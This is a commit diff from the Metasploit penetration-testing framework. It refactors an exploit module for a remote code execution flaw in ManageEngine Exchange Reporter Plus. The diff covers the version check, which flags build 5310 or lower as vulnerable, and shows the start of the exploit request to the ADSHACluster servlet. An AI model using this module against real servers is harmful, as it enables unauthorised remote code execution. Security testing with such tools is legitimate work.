Code review changes

Use target_uri, split url inside normalize function, replace print with vprint, return CheckCode::Appears
2018-07-12 14:27:28 +02:00 · 2018-07-12 14:27:28 +02:00 · 486225c2a8
parent 2196640de4
commit 486225c2a8
1 changed files with 27 additions and 25 deletions
--- a/modules/exploits/windows/http/manageengine_adshacluster_rce.rb
+++ b/modules/exploits/windows/http/manageengine_adshacluster_rce.rb
@ -46,39 +46,41 @@ class MetasploitModule  < Msf::Exploit::Remote

  def check
    res = send_request_cgi({
-      'method'   => 'POST',
-      'uri'      => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/GetProductVersion')
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
    })

-    if res && res.code == 200
-      begin
-        json = res.get_json_document
-      rescue JSON::ParserError => e
-        print_error("Failed: #{e.class} - #{e.message}")
-        return Exploit::CheckCode::Unknown
-      end
-
-      if json.empty? || !json['BUILD_NUMBER']
-        print_error("Wrong server response")
-        return Exploit::CheckCode::Unknown
-      end
-
-      print_status "Version: #{json['BUILD_NUMBER']}"
-
-      if json['BUILD_NUMBER'].to_i <= 5310
-        Exploit::CheckCode::Vulnerable
-      else
-        Exploit::CheckCode::Safe
-      end
-    else
-      Exploit::CheckCode::Unknown
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Safe
    end
+
+    unless res.code == 200
+      vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
+      return CheckCode::Safe
+    end
+
+    begin
+      json = res.get_json_document
+      raise if json.empty? || !json['BUILD_NUMBER']
+    rescue
+      vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
+      return CheckCode::Safe
+    end
+
+    vprint_status "Version: #{json['BUILD_NUMBER']}"
+
+    if json['BUILD_NUMBER'].to_i <= 5310
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
  end

  def exploit
    res = send_request_cgi({
      'method'    => 'POST',
-      'uri'       => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/ADSHACluster'),
+      'uri'       => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
      'vars_post' => {
        'MTCALL'  => "nativeClient",
        'BCP_RLL' => "0102",